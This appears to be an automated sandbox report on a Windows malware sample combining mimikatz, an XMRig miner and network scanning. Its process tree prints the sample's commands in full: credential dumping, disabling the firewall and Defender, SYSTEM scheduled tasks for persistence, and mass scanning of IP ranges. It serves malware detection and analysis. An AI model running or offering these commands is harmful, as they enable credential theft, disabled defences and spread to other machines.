Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
01/05/2024, 08:42
General
-
Target
2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
a59bf0c817acd5e557d215d7a51e211e
-
SHA1
a8ad9ef731dc6cdc86115d1971027e0d15d268c1
-
SHA256
d86cdf9c41a6014be48e3591e52048a874c084ec27b849628fcc72390b2ef540
-
SHA512
c9586db49a49d9f201ec49f025442a3bd84cf32d3af8ddbee5bedc53629e8f5e2f50d79c364205e4e40e9d8cce425838af9992a91b39f09e9d67264a2e2136be
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30801) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 38 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 26 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 39 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\mknctelvt\hnembi.exe"C:\Windows\TEMP\mknctelvt\hnembi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\meqvcrkb\zienqub.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\meqvcrkb\zienqub.exeC:\Windows\meqvcrkb\zienqub.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\meqvcrkb\zienqub.exeC:\Windows\meqvcrkb\zienqub.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\himbnbstt\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\ezlvzsbsa\himbnbstt\wpcap.exeC:\Windows\ezlvzsbsa\himbnbstt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ezlvzsbsa\himbnbstt\Scant.txt2⤵
-
C:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exeC:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ezlvzsbsa\himbnbstt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ezlvzsbsa\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ezlvzsbsa\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\ezlvzsbsa\Corporate\vfshost.exeC:\Windows\ezlvzsbsa\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "feqvbnlvq" /ru system /tr "cmd /c C:\Windows\ime\zienqub.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "feqvbnlvq" /ru system /tr "cmd /c C:\Windows\ime\zienqub.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "crtfhvbif" /ru system /tr "cmd /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "crtfhvbif" /ru system /tr "cmd /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ezibhbgat" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ezibhbgat" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 784 C:\Windows\TEMP\ezlvzsbsa\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 336 C:\Windows\TEMP\ezlvzsbsa\336.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2088 C:\Windows\TEMP\ezlvzsbsa\2088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2500 C:\Windows\TEMP\ezlvzsbsa\2500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2852 C:\Windows\TEMP\ezlvzsbsa\2852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 2868 C:\Windows\TEMP\ezlvzsbsa\2868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3168 C:\Windows\TEMP\ezlvzsbsa\3168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3824 C:\Windows\TEMP\ezlvzsbsa\3824.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 3952 C:\Windows\TEMP\ezlvzsbsa\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 4016 C:\Windows\TEMP\ezlvzsbsa\4016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1044 C:\Windows\TEMP\ezlvzsbsa\1044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 4684 C:\Windows\TEMP\ezlvzsbsa\4684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1296 C:\Windows\TEMP\ezlvzsbsa\1296.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1948 C:\Windows\TEMP\ezlvzsbsa\1948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ezlvzsbsa\veceiebei.exeC:\Windows\TEMP\ezlvzsbsa\veceiebei.exe -accepteula -mp 1172 C:\Windows\TEMP\ezlvzsbsa\1172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ezlvzsbsa\himbnbstt\scan.bat2⤵
-
C:\Windows\ezlvzsbsa\himbnbstt\nlmvblguv.exenlmvblguv.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\dipzew.exeC:\Windows\SysWOW64\dipzew.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zienqub.exe1⤵
-
C:\Windows\ime\zienqub.exeC:\Windows\ime\zienqub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zienqub.exe1⤵
-
C:\Windows\ime\zienqub.exeC:\Windows\ime\zienqub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
44.0MB
MD50ef407e4bb4476360e4b9597f73ba0eb
SHA12ab72059a23dd17f34dee994b785b1b445384b51
SHA256933a4169e2434201580833696cfe7e6ff573dd71a5d3108091aee7ad1d5a79f6
SHA512cec6b8bcdafdfe5aac6121aae99b2f1b7a1ac7bd8051bf9345f4e554038ac558c5e17204ecb686256b2c94538d43d9de92f7157db5ece3bb91b34a45441693b9
-
Filesize
26.4MB
MD57cb8fd6f9fdf829c8ee94089bc7e8b4d
SHA1a20fdd42baf468cff90869b4f4916bc417abfe37
SHA256e8362118699f15f91bff4fc49bd2e125cde54b820a0b5bc40d5e76aaf6b3a52b
SHA5128cbd704f1d4609504bb6c60ddafb5634dd32209380cb975a831902eb7cc27485480ea9bff9dd7af9394d79fdb8f41267527befe9b6108d479eabdf6a668af435
-
Filesize
8.7MB
MD5242954c7502688c0a25cc382379b9bf6
SHA1f2aab13326ce362dd373960afb237c721b2b2b3d
SHA256be669009972f8fcd46af66d7564e158cbf6600e11f3b1b74b8104276750fad43
SHA512e263b6d11868089178af287216ddd7f416299e8292a0f8d9d0ada021a3f91d472b759ca8dbe04dfe9fc6703281ba3b92ff59866f307bcad3d127840dc8f12364
-
Filesize
4.1MB
MD58460dda4bc4f90728650060316d4885d
SHA144b89b4309344fefbea64fe37b1b2143d3b5af3b
SHA2560337adf0f807c9df69215c9a4e467ff2c0292c4bb937b702ee750cc9ae04656b
SHA512c26529b41abc9cfc497b93a3caf69ceb87550ed357da4e0c25b8233520ac4aaf71fff1cc2a644bdc2a6c897249e486e727bb6136e1a8c27539268304c7b97a96
-
Filesize
4.1MB
MD5f3dccaac1af44d0e198fbe9e2aa91fed
SHA11135aaaf50866e7a97d0f8172cd821749334c8e8
SHA256ce86ed4d85f13d13a8bfea7ac6106449db0c789c07d23d599d7c29b909180774
SHA5124edf3c132b9d6f2a9744bbf9e9afe57a6d67b00a821eddd1e650068ee245728e377620af217a1a88c94e5e97d0a754dc0a9ee75badfae681ea9968e6d20b0ec5
-
Filesize
3.0MB
MD5b5e5469df1ec45e72d7808bdfc93ae22
SHA1e71e5d62ba5fc0f14c670163eaf2677679eaeb0f
SHA256ef76d5255b05f881653ba8b1f24b92bfa92e53ad478df4bd30e39c0d9bc0d8c0
SHA512b356901bdcdbcad990adb3e16398fb37285710eba8bd860fcabc1ebb29a04274b8057adf1a2853532fade5022cd87a761c2fe3848e01583bf52a3fab50d11886
-
Filesize
7.5MB
MD55f087004bdd4878922f88bbcb8ccf9bc
SHA13912b6a77c838de01d06c5dfd026676d5ecab5f2
SHA25616137b964affc61ad9c209dadc0494132c5e6fae15cd7333cefde3b2a8e5d8f6
SHA512c1bbb0d21cd72e674ce843f527714e78f0813ba83e499bc1b10f18f56f8eae57c1b7d609ba8cce73a77c63262e75feb90d849fc66d1b25456f071fb073d58211
-
Filesize
818KB
MD58f71639ea5a61e533dcff192f5be1f9e
SHA11d35e29e2d5e99dacd116f567083c106dc0364c4
SHA25676aa3c40c467cd9aca5a74f5a618dc5cc6ea2879c3f462eaf792ca243a042e2d
SHA512f58d5ca29cdc8bcc57ad3768ee52da66a77e7aceb3f4b8e687ca5372f510fc6934744aa30623b6a3ec8d2e1f27edb38e92036012e1ace8eed9c08b0115c185b4
-
Filesize
33.7MB
MD58043e3d2d4b6365b6d2f4c9100883bef
SHA15bfabefca1bed79d0ecdbb3084e802aecb384bad
SHA2565614ffdfba2357192a13a8d0e9445752796d0cdf3d8258239894224826f913c6
SHA512a7d13f356165c93eba66d3e5418bc96d6c24c392df0ea3559e4c3022e49cc5fdaac1db9fdedce411bc492679168e5240c1cb0a933cf544fb2f549a26fa737f6d
-
Filesize
2.4MB
MD598440e58cfd500ef2f8fb9c76db59700
SHA12e2052210b5f32c0a8a3872e0ab61c7ba4dcf28d
SHA2566de43a3c468945a41321dfeb6c5a757459959440533aae3d1e286a6d021d1b11
SHA512011805dffc73f8994857394cc75c9a57efe67181d8a0a4e7056d03f77911186c6df3d90b570791fcc9568089adae3a0da32b63d38cbb42388fc44035a87f9922
-
Filesize
21.0MB
MD58ba3c0e2992ae0bcd03ba781c22c852c
SHA1df9ddcb0bf445f6c73b59923ee9619b3e48a5bcf
SHA2562e41e1b2a1e71003520e9dbcb4ceff53e1c75ed5bfcf1f059fae28c92bd560da
SHA51221fa0d5c63b5a289142b215b0e3f66187b4f7adf44dee1185d3fa62c34aea9dd84338c328a211c372219191a9784ef02745a7f9a721172db82e958a6b54e4467
-
Filesize
4.2MB
MD59b1aab8039a6e144924cd17cb53b6b3d
SHA11013555d9e5f293a3950e6da9bfb271add7f55c7
SHA2561a2db107ddcb30d4405d2c8d8ea0e4e208186ae01ec992c1a5234d55bf81a663
SHA5128e3fc3578f5a0fd19f438038e55e2ecb9081796199031e0e2741d9b8d66bfe0555dc8529044d7da5bc387e64eda2afbc70849b7cceccf7565a0489323b2aa709
-
Filesize
1.2MB
MD581b882a350a1c3357b12a09133772e5c
SHA12a26dfe4da2d00fd0683c686f47e37f17c46e75c
SHA256e7d0e8e2c2eef881bd841ed8a38de20f3ebcc2966de7a3fa9c8d4438ddcdc050
SHA5122d3a21bd45ec3603119446e462aec9e970d99d0bec82e72c00575abe66fee61794f2adf5117eb4f14e1e1b705cf6821460095f66d0cd9cdfda602ed5def9a740
-
Filesize
1.9MB
MD5c0e0a7ec8a4b0b1d7897cdd41dca7e29
SHA1f66caab36d658aaa1d54d4dac7ebffbf65c90807
SHA2564e2d67c072f605964783b4a28d4e0f7aad05f817107799a66dae8b21c2893aec
